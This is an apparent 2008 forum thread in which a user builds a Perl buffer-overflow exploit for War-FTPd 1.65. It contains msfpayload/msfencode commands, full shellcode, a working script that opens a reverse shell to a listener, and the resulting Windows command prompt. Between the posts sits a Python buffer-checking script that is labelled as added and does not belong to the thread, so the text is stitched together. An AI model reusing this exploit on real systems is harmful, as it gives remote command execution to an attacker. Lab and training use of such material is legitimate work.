
question about building a perl exploit using metasploit


apollo

Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Thu Jul 10, 2008 12:30 am

question about building a perl exploit using metasploit

I was recently trying to put together an example of how you can use metasploit to generate exploit code and I ran up against an issue.  Hopefully someone can tell me where I went wrong in this process.

The exploit I wanted to demo was warftpd 1.65, since there's a whole lot of stuff out there on it already. Looking at the metasploit module
exploit/windows/ftp/warftpd_165_user, I find that
  Code:
'BadChars' => "\x00\x0a\x0d\x40",
'Ret'      => 0x71ab1d54  # for XP SP0


Now, using the msf tools, I generate the exploit code:
  Code:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -b  '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 205

"\xbd\x69\x9e\x09\x95\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1" .
"\x2d\x58\x31\x68\x14\x83\xe8\xfc\x03\x68\x10\x8b\x6b\xf5" .
"\xff\xa0\xd3\xee\xf9\xc9\x23\x11\x99\x04\x07\x65\x27\x5a" .
"\x3c\x06\xe5\xda\x43\x18\x9e\x4d\x64\xe7\x4b\xfa\x50\x7d" .
"\x8a\x12\xa9\x41\x14\x46\x0b\x8b\x2a\x97\x4e\x88\xf5\xe2" .
"\xb8\xd2\x93\x35\x8f\xa0\xb8\x0e\x84\x04\x1b\x91\x73\xfc" .
"\xe8\x8d\xda\x8a\xa0\xb1\xdd\x65\x3d\xe5\x44\xfc\x2e\xd1" .
"\x6a\x9e\x51\xf9\xa2\xbb\xca\x72\x87\x0b\x98\xc4\x04\xe7" .
"\xee\xd8\xb9\x7c\x66\xe8\x9f\xe4\x24\x8e\x77\xda\xf8\x26" .
"\xff\x6f\xcf\xe9\xab\xe9\x96\x67\x34\x09\x3e\x12\xe7\xa6" .
"\xec\x4f\x4b\x1a\x50\x3c\xc2\x7b\x30\x43\x3b\x8b\xbf\x14" .
"\x97\xea\x06\x7d\xc8\x0c\xae\xe7\x4e\x5a\x20\x18\x66\x0c" .
"\xd7\x26\x2f\x01\xa9\xc0\x58\x77\xf5\x6a\xca\xfe\xe6\x18" .
"\xfc\x53\xbe\xba\x45\x04\x45\xbd\x60\xfb\xf1\x4d\xdd\xaf" .
"\xae\x1e\xbb\xf6\x91\x98\xbc\xef\x18";


and then I incorporate all of that into the perl exploit

  Code:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

# Connect to the War FTP Daemon 1.65 target (lab address).
my $sock = IO::Socket::INET->new(
                PeerAddr => "192.168.50.128",
                PeerPort => "21",
                Proto    => "tcp",
                ) or die "connect failed: $!";
my $trash = <$sock>;    # discard the 220 banner

# USER overflow: 485 bytes of filler up to EIP, the XP SP0 return address
# 0x71ab1d54 in little-endian byte order, then 115 bytes of padding before
# the encoded payload.
my $str = "USER " . "A"x485 . "\x54\x1d\xab\x71" . "\x41"x115;
# windows/shell/reverse_tcp (staged), shikata_ga_nai output of msfencode -t perl
$str .= "\x29\xc9\xb1\x2d\xda\xc5\xb8\x0b\xe6\x4f\x25\xd9\x74\x24" .
"\xf4\x5e\x31\x46\x15\x03\x46\x15\x83\xc6\x04\xe9\x13\xb3" .
"\x4f\x06\x9c\xa4\x69\x27\xdc\xca\xea\xe6\xf8\xbe\x96\x34" .
"\x74\xbc\x55\x3c\x8b\xd2\x2d\xeb\xab\x2d\xd8\x98\x98\xb7" .
"\x1d\x70\xd1\x07\x84\x20\xd3\x42\xba\x39\x16\xd6\x05\x4c" .
"\x60\x94\xe3\x97\x46\x6e\x0f\xac\xdd\xde\xeb\x33\x0b\x86" .
"\x78\x2f\x92\xcc\x30\x53\x25\x3a\xcd\x47\xbc\x35\xbe\xb3" .
"\xa2\x24\xc0\x5b\xeb\x7d\x5a\x10\x4f\xb2\x28\x66\x5c\x39" .
"\x5e\x7a\xf1\xb6\xf7\x8a\x57\xaf\x54\xec\x0f\x1c\x69\x98" .
"\xb8\x11\xbf\x07\x13\xb0\x06\xc5\xfb\xc3\xaf\xbc\xaf\x68" .
"\x03\xed\x0c\xdc\xe0\x42\x1a\x05\x80\xe5\xf3\xc2\x4f\xb2" .
"\x58\xb5\xf6\xdb\x80\xc6\xdf\x45\x86\x91\x8f\x76\x2e\x76" .
"\x27\x48\x67\x4b\x39\x2e\x10\xbd\x65\xc8\xb3\x34\x76\x7e" .
"\x24\x14\x2e\x18\xfd\xcd\xd5\x1b\x2b\xa1\x61\xef\x84\x11" .
"\xdd\xbc\x42\x2f\x21\x7a\x74\xa9\xa8";
print $sock $str . "\r\n";
$trash = <$sock>;       # reply to USER, if the server is still answering
print $sock "pass test \r\n";
close($sock);


The exploit is launched when I run it and my listener gets a connection back; however, it doesn't appear that cmd.exe is ever spawned, and as soon as I send anything on the connection back the application crashes. When I do it from within metasploit it works great, so I feel comfortable that this is something I'm doing wrong.

Thanks in advance for any insight.
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+

apollo

Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Thu Jul 10, 2008 9:25 pm

Re: question about building a perl exploit using metasploit

I figured I'd post back my solution in case anyone was interested, or in case anyone finds this via google (I was surprised that when I searched for msfencode and 2008 after < 24 hrs this was like the 5th entry on google). I'm not sure why I didn't think about it, but the multi-stage payload was the problem. When I switched to using a single-stage payload, that fixed the problem.

I punted and went and built the payload in executable form:
  Code:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 x > exp.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 177
Options: exitfunc=process,lhost=192.168.50.129,lport=4444


But... when I went to run exp.exe on the vulnerable machine... it crashed, which is what brought me back to the single stage. Anyway... I got success with the windows/shell_reverse_tcp payload.

  Code:
~/metasploit$ ./msfpayload windows/shell_reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r |./msfencode  -s 414 -b '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 315

"\xd9\xe1\x33\xc9\xd9\x74\x24\xf4\xb1\x49\x5a\xbf\x33\x3a" .
"\x88\xc8\x31\x7a\x17\x83\xea\xfc\x03\x49\x29\x6a\x3d\x51" .
"\x27\x81\xf3\x41\x41\xaa\xf3\x6e\xd2\xde\x60\xb4\x37\x6a" .
"\x3d\x88\xbc\x10\xbb\x88\xc3\x07\x48\x27\xdc\x5c\x10\x97" .
"\xdd\x89\xe6\x5c\xe9\xc6\xf8\x8c\x23\x19\x63\xfc\xc0\x59" .
"\xe0\xfb\x09\x93\x04\x02\x48\xcf\xe3\x3f\x18\x34\x24\x4a" .
"\x45\xbf\x6b\x90\x84\x2b\xf5\x53\x8a\xe0\x71\x3c\x8f\xf7" .
"\x6e\xc1\x83\x7c\xf9\xa9\xff\x9e\x9b\xf2\x31\x44\x3f\x7f" .
"\x72\x4a\x4b\x3f\x79\x21\x3b\xa3\x2c\xbe\xfc\xd3\x70\xa9" .
"\x72\xad\x82\xc5\xdb\xce\x4d\x73\x8f\x56\x1a\x4f\x1d\xfe" .
"\xad\xdc\x53\xa1\x05\xdc\x44\x35\x6d\xcf\x99\xfe\x21\xef" .
"\xb4\x5f\x4b\xea\x5f\xde\xa6\xfd\x9d\xb5\x52\xfc\x5e\xe5" .
"\xcb\xd9\xa8\xf0\xa1\x8d\x55\x2c\xea\x62\xf9\x83\x4e\xd6" .
"\xbe\x70\xae\x08\x28\xb6\xf8\x9b\x28\x50\x91\xca\x76\xfa" .
"\x32\x64\x67\x97\xdd\x9a\x91\x3d\x7d\x34\x9d\x97\x14\xaa" .
"\x30\x42\x16\x1a\xd4\x06\x8c\xfd\x71\xb5\x21\x68\xd2\x60" .
"\x93\xa0\x5b\x75\x89\x7c\xd5\x9b\x7f\xbd\x16\xf1\x15\xb4" .
"\x24\xfb\x54\xea\x28\x41\x75\x79\xae\x7d\x2e\x2a\xe4\x15" .
"\x42\xd3\x48\xf3\x5d\x5e\x87\x04\x77\xfa\x80\xa8\x29\xac" .
"\x7f\x26\xcb\x1f\xd1\xe3\x9a\x60\x01\x63\xb0\x46\xa7\xbd" .
"\x99\x87\x7e\x2b\xe1\x87\x48\x54\xcd\x10\x50\xd3\x28\x99" .
"\x61\x56\xb1\xa5\x48\x67\xce\xa5\x8a\x47\x59\x28\xad\x85" .
"\xe9\x87\xb2\x9f\xf1\xf8\x47";


Which brought me back to the final code, which worked:
  Code:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

# Connect to the War FTP Daemon 1.65 target (lab address).
my $sock = IO::Socket::INET->new(
                PeerAddr => "192.168.50.128",
                PeerPort => "21",
                Proto    => "tcp",
                ) or die "connect failed: $!";

# USER overflow: 485-byte NOP sled up to EIP, the XP SP0 return address
# 0x71ab1d54 in little-endian byte order, a 115-byte NOP sled, then the
# encoded payload.
my $str = "USER " . "\x90"x485 . "\x54\x1d\xab\x71" . "\x90"x115;
# windows/shell_reverse_tcp (single-stage), shikata_ga_nai output of msfencode -t perl
$str .= "\xb8\x84\x3b\x15\xf2\xda\xdb\xd9\x74\x24\xf4\x31\xc9\xb1" .
"\x49\x5a\x83\xea\xfc\x31\x42\x0e\x03\xc6\x35\xf7\x07\x3a" .
"\x23\x1c\xaa\x2a\x4d\x1d\xca\x55\xce\x69\x59\x8d\x2b\xe5" .
"\xe7\xf1\xb8\x85\xe2\x71\xbe\x9a\x66\xce\xd8\xef\x26\xf0" .
"\xd9\x04\x91\x7b\xed\x51\x23\x95\x3f\xa6\xbd\xc5\xc4\xe6" .
"\xca\x12\x04\x2c\x3f\x1d\x44\x5a\xb4\x26\x1c\xb9\x1d\x2d" .
"\x79\x4a\x02\xe9\x80\xa6\xdb\x7a\x8e\x73\xaf\x23\x93\x82" .
"\x44\xd8\x87\x0f\x13\xb2\xf3\x13\x45\x89\xcd\xf0\xe1\x86" .
"\x6d\x37\x61\xd8\x7d\xbc\x05\xc4\xd0\x49\xa5\xfc\x74\x26" .
"\xa8\xb2\x86\x5a\xe4\xb5\x41\xc4\x56\x2f\x06\x3a\x6b\xc7" .
"\xa1\x4f\xb9\x48\x1a\x4f\x6d\x1e\x69\x42\x72\xe5\x3d\x62" .
"\x5d\x46\x37\x79\x04\xf9\xaa\x8a\xcb\xac\x5e\x89\x34\x9e" .
"\xf7\x54\xc3\xeb\xa5\x30\x2b\xc5\xe5\xed\x80\xba\x4a\x41" .
"\x64\x6f\xb2\xb5\x02\x4f\xe4\x04\x52\x29\x9d\x79\x08\xd3" .
"\x0e\xf3\x51\x8e\xd9\xef\x6b\x1a\x79\xa7\x74\x8c\x10\x57" .
"\xda\x65\x1a\x87\xba\xef\x80\x4e\x2b\x8c\x25\xe5\xfb\x0b" .
"\x9f\x35\x72\x4c\xb5\x81\x0c\x70\x7b\xca\xfc\xde\xe9\x43" .
"\xff\xe0\x50\x79\xfe\x5e\x79\x0c\x84\x66\x2a\xa5\xd2\xfe" .
"\x5e\x44\x97\xe8\x61\xcd\xf0\xeb\x48\x75\x56\x41\x24\xdb" .
"\x09\x0f\xc7\x8a\xf8\x9a\x96\xd3\x2b\x4c\xb4\xf5\xc9\x42" .
"\x95\xfa\x04\x30\xe5\xfa\x9e\x3b\xc9\x6d\x06\xba\x2c\x14" .
"\x37\x49\xb5\x18\x11\x4e\xc2\x1a\x61\x60\x45\x9d\x46\x62" .
"\xe5\x32\x88\xb4\xf5\x65\x7c";
print $sock $str . "\r\n";
close($sock);


and then... tada!
  Code:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\War-ftpd>
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
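A pre-flight check for the buffer built above, added here as an example and not part of apollo's posts. It parses the `"\x.."` string literals that `msfencode -t perl` prints, rebuilds the USER command with the layout the working script uses (485 bytes to EIP, the 0x71ab1d54 return address packed little-endian, 115 bytes of padding, then the payload), and scans everything between "USER " and the terminating CRLF for the module's BadChars. The sample input is the first three lines of the msfencode output quoted in the post, used only to exercise the parser; the 414-byte size limit is taken from the `-s 414` passed to msfencode and treated here as the maximum payload the buffer can hold, which is an assumption. The check is in Python rather than Perl so it can run stand-alone.

```python
"""Sanity-check a War-FTPd 1.65 USER overflow buffer before sending it.

Added example (not from the forum post): parses msfencode's Perl string
literals, rebuilds the buffer layout used in the thread, and verifies that
nothing between "USER " and the terminating CRLF is a bad character.
"""
import re
import struct

# From the warftpd_165_user module quoted in the post.
BAD_CHARS = b"\x00\x0a\x0d\x40"   # NUL, LF, CR, '@'
RET_ADDR = 0x71AB1D54             # XP SP0 return address
# Layout taken from the working Perl script: 485 bytes to EIP, 4-byte
# return address, 115 bytes of padding, then the encoded payload.
OFFSET_TO_RET = 485
PAD_AFTER_RET = 115
# Assumption: the `-s 414` given to msfencode in the post is the largest
# payload the buffer can carry.
MAX_PAYLOAD = 414

# Sample input: the first three lines of the msfencode output in the post,
# used only to exercise the parser (42 bytes, not a complete payload).
SAMPLE_PERL_OUTPUT = r'''
"\xd9\xe1\x33\xc9\xd9\x74\x24\xf4\xb1\x49\x5a\xbf\x33\x3a" .
"\x88\xc8\x31\x7a\x17\x83\xea\xfc\x03\x49\x29\x6a\x3d\x51" .
"\x27\x81\xf3\x41\x41\xaa\xf3\x6e\xd2\xde\x60\xb4\x37\x6a";
'''


def parse_perl_hex(text):
    """Convert msfencode's `"\\x.."` Perl string literals into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(buf, bad=BAD_CHARS):
    """Return (offset, byte) for every occurrence of a bad character in buf."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def build_user_command(payload, ret=RET_ADDR, filler=b"\x90"):
    """Assemble the FTP USER command exactly as the Perl exploit lays it out."""
    body = (filler * OFFSET_TO_RET
            + struct.pack("<I", ret)          # little-endian: "\x54\x1d\xab\x71"
            + filler * PAD_AFTER_RET
            + payload)
    return b"USER " + body + b"\r\n"


def check_exploit_buffer(buf, payload_len):
    """Report the layout and any bad characters; the CRLF terminator is excluded."""
    if not (buf.startswith(b"USER ") and buf.endswith(b"\r\n")):
        raise ValueError("buffer is not a CRLF-terminated USER command")
    body = buf[len(b"USER "):-2]
    ret = struct.unpack("<I", body[OFFSET_TO_RET:OFFSET_TO_RET + 4])[0]
    return {
        "body_len": len(body),
        "ret": ret,
        "ret_offset": OFFSET_TO_RET,
        "payload_offset": OFFSET_TO_RET + 4 + PAD_AFTER_RET,
        "payload_fits": payload_len <= MAX_PAYLOAD,
        "bad_chars": find_bad_chars(body),
    }


if __name__ == "__main__":
    sc = parse_perl_hex(SAMPLE_PERL_OUTPUT)
    report = check_exploit_buffer(build_user_command(sc), len(sc))
    print("payload bytes: %d, body bytes: %d" % (len(sc), report["body_len"]))
    print("ret 0x%08x at body offset %d, payload at offset %d"
          % (report["ret"], report["ret_offset"], report["payload_offset"]))
    if report["bad_chars"]:
        print("BAD CHARS:", ["0x%02x@%d" % (b, i) for i, b in report["bad_chars"]])
    else:
        print("no bad characters in the buffer")
    # A return address containing 0x0a would be caught before it hits the wire.
    broken = check_exploit_buffer(build_user_command(sc, ret=0x71AB0A54), len(sc))
    print("0x71ab0a54 would introduce:", broken["bad_chars"])
```

The scan covers the return address and the sled as well as the encoded payload, because msfencode only guarantees the bytes it emitted are clean; a hand-typed return address or filler byte can still reintroduce a bad character, and War-FTPd will truncate or mangle the command at the first one. As the replies in the thread note, the check says nothing about the listener side: a plain netcat listener can only catch a single-stage payload such as windows/shell_reverse_tcp, whereas a staged payload needs a Metasploit handler to send the second stage.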

KrisTeason


Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Thu Jul 10, 2008 10:05 pm

Re: question about building a perl exploit using metasploit

Nice work.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

LSOChris

Post Thu Jul 10, 2008 10:35 pm

Re: question about building a perl exploit using metasploit

That makes sense, since there was no payload handler in place.

RoleReversal


Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Fri Jul 11, 2008 2:23 am

Re: question about building a perl exploit using metasploit

Nicely done, Apollo, and thanks for posting the solution as well as the problem.
